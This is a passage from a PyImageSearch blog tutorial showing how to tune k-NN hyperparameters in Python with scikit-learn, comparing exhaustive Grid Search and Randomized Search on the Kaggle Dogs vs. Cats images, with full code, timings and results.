
# construct the set of hyperparameters to tune
params = {"n_neighbors": np.arange(1, 31, 2),
        "metric": ["euclidean", "cityblock"]}

# tune the hyperparameters via a cross-validated grid search
print("[INFO] tuning hyperparameters via grid search")
model = KNeighborsClassifier(n_jobs=args["jobs"])
grid = GridSearchCV(model, params)
start = time.time()
grid.fit(trainData, trainLabels)

# evaluate the best grid searched model on the testing data
print("[INFO] grid search took {:.2f} seconds".format(
        time.time() - start))
acc = grid.score(testData, testLabels)
print("[INFO] grid search accuracy: {:.2f}%".format(acc * 100))
print("[INFO] grid search best parameters: {}".format(
        grid.best_params_))

The primary benefit of the Grid Search algorithm is also it’s major drawback: as an exhaustive search your number of possible parameter values explodes as both the number of hyperparameters and hyperparameter values increases.

Sure, you get to evaluate each and every combination of hyperparameter — but you pay a cost — it’s a very time consuming cost. And in most cases, it’s hardly worth it.

As I explain in the “Use Randomized Search for hyperparameter tuning (in most situations)” section below, there are rarely just one set of hyperparameters that obtain the highest accuracy.

Instead, there are “hot zones” of hyperparameters that all obtain near identical accuracy. The goal is to explore as many of these “zones” of hyperparameters a quickly as possible and locate one of these “hot zones”. It turns out that a random search is a great way to do this.

Randomized Search hyperparameters

The Random Search approach to hyperparameter tuning will sample hyperparameters from our

params
  dictionary via a random, uniform distribution. Given a set of randomly sampled parameters, a model is then trained and evaluated.

We perform this set of random hyperparameter sampling and model construction/evaluation for a preset number of times. You set the number of evaluations to be as long as you’re willing to wait. If you’re impatient and in a hurry, make this value low. And if you have the time to spend on a longer experiment, increase the number of iterations.

In either case, the goal of a Randomized Search is to explore a large set of possible hyperparameter spaces quickly — and the best way to accomplish this is via simple random sampling. And in practice, it works quite well!

You can find the code to perform a Randomized Search of hyperparameters for the k-NN algorithm below:

# import the necessary packages
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import RandomizedSearchCV
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from imutils import paths
import numpy as np
import argparse
import imutils
import time
import cv2
import os

def extract_color_histogram(image, bins=(8, 8, 8)):
        # extract a 3D color histogram from the HSV color space using
        # the supplied number of `bins` per channel
        hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,
                [0, 180, 0, 256, 0, 256])

        # handle normalizing the histogram if we are using OpenCV 2.4.X
        if imutils.is_cv2():
                hist = cv2.normalize(hist)

        # otherwise, perform "in place" normalization in OpenCV 3 (I
        # personally hate the way this is done
        else:
                cv2.normalize(hist, hist)

        # return the flattened histogram as the feature vector
        return hist.flatten()

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset")
ap.add_argument("-j", "--jobs", type=int, default=-1,
        help="# of jobs for k-NN distance (-1 uses all available cores)")
args = vars(ap.parse_args())

# grab the list of images that we'll be describing
print("[INFO] describing images...")
imagePaths = list(paths.list_images(args["dataset"]))

# initialize the data matrix and labels list
data = []
labels = []

# loop over the input images
for (i, imagePath) in enumerate(imagePaths):
        # load the image and extract the class label (assuming that our
        # path as the format: /path/to/dataset/{class}.{image_num}.jpg
        image = cv2.imread(imagePath)
        label = imagePath.split(os.path.sep)[-1].split(".")[0]

        # extract a color histogram from the image, then update the
        # data matrix and labels list
        hist = extract_color_histogram(image)
        data.append(hist)
        labels.append(label)

        # show an update every 1,000 images
        if i > 0 and i % 1000 == 0:
                print("[INFO] processed {}/{}".format(i, len(imagePaths)))

# partition the data into training and testing splits, using 75%
# of the data for training and the remaining 25% for testing
print("[INFO] constructing training/testing split...")
(trainData, testData, trainLabels, testLabels) = train_test_split(
        data, labels, test_size=0.25, random_state=42)

# construct the set of hyperparameters to tune
params = {"n_neighbors": np.arange(1, 31, 2),
        "metric": ["euclidean", "cityblock"]}

# tune the hyperparameters via a cross-validated grid search
print("[INFO] tuning hyperparameters via grid search")
model = KNeighborsClassifier(n_jobs=args["jobs"])
grid = GridSearchCV(model, params)
start = time.time()
grid.fit(trainData, trainLabels)

# evaluate the best grid searched model on the testing data
print("[INFO] grid search took {:.2f} seconds".format(
        time.time() - start))
acc = grid.score(testData, testLabels)
print("[INFO] grid search accuracy: {:.2f}%".format(acc * 100))
print("[INFO] grid search best parameters: {}".format(
        grid.best_params_))

# tune the hyperparameters via a randomized search
grid = RandomizedSearchCV(model, params)
start = time.time()
grid.fit(trainData, trainLabels)

# evaluate the best randomized searched model on the testing
# data
print("[INFO] randomized search took {:.2f} seconds".format(
        time.time() - start))
acc = grid.score(testData, testLabels)
print("[INFO] grid search accuracy: {:.2f}%".format(acc * 100))
print("[INFO] randomized search best parameters: {}".format(
        grid.best_params_))

Hyperparameter tuning with Python and scikit-learn results

To tune the hyperparameters of our k-NN algorithm, make sure you:

  1. Download the source code to this tutorial using the “Downloads” form at the bottom of this post.
  2. Head over to the Kaggle Dogs vs. Cats competition page and download the dataset.

From there, you can execute the following command to tune the hyperparameters:

$ python knn_tune.py --dataset kaggle_dogs_vs_cats

You’ll probably want to go for a nice walk and stretch your legs will the

knn_tune.py
  script executes.

On my machine, it took 19m 26s to complete, with over 86% of this time spent Grid Searching:

Figure 2: Applying a Grid Search and Randomized to tune machine learning hyperparameters using Python and scikit-learn.

Figure 2: Applying a Grid Search and Randomized to tune machine learning hyperparameters using Python and scikit-learn.

As you can see from the output screenshot, the Grid Search method found that k=25 and metric=’cityblock’ obtained the highest accuracy of 64.03%. However, this Grid Search took 13 minutes.

On the other hand, the Randomized Search obtained an identical accuracy of 64.03% — and it completed in under 5 minutes.

Both of these hyperparameter tuning methods improved our classification accuracy (64.03% accuracy, up from 57.58% from last week’s post) — but the Randomized Search was much more efficient.

Use Randomized Search for hyperparameter tuning (in most situations)

Unless your search space is small and can easily be enumerated, a Randomized Search will tend to be more efficient and yield better results faster.

As our experiments demonstrated, Randomized Search was able to obtain 64.03% accuracy in < 5 minutes while an exhaustive Grid Search took a much longer 13 minutes to obtain an identical 64.03% accuracy — that’s a 202% increase in evaluation time for identical accuracy!

In general, there isn’t just one set of hyperparameters that obtains optimal results — instead, there are usually a set of them that exist towards the bottom of a concave bowl (i.e., the optimization surface).

As long as you hit just one of these parameters towards the bottom of the bowl, you’ll still obtain the same accuracy as if you enumerated all possibilities along the bowl. Furthermore, you’ll be able to explore various regions of this bowl faster by applying a Randomized Search.

Overall, this will lead to faster, more efficient hyperparameter tunings in most situations.

Summary

In today’s blog post, I demonstrated how to tune hyperparameters to machine learning algorithms using the Python programming language and the scikit-learn library.

First, I defined, the difference between standard “model parameters” and the “hyperparameters” that need to be tuned.

From there, we applied two methods to tune hyperparameters:

  1. An exhaustive Grid Search
  2. A Randomized Search

Both of these hyperparameter tuning routines were then applied to the k-NN algorithm and the Kaggle Dogs vs. Cats dataset.

Each respective tuning algorithm obtained identical accuracy — but the Randomized Search was able to obtain this increase of accuracy in a fraction of the time!

In general, I highly encourage you to use Randomized Search when tuning hyperparameters. You’ll often find that there is rarely just one set of hyperparameters that obtains optimal accuracy. Instead, there are “hot zones” of hyperparameters that will obtain near-identical accuracy — the goal is to explore as many zones and try to land on one of these zones as fast as possible.

Given no a priori knowledge of good hyperparameter choices, a Randomized Search to hyperparameter tuning is the most optimal way to find reasonable hyperparameter values in a short amount of time as it allows you to explore many areas of the optimization surface.

Anyway, I hope you enjoyed this blog post! I’ll be back next week to discuss the basics of linear classification (and the role it plays in Neural Networks and image classification).

But before you go, be sure to signup for the PyImageSearch Newsletter using the form below to be notified when future blog posts are published!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post How to tune hyperparameters with Python and scikit-learn appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2aNY1gk
via IFTTT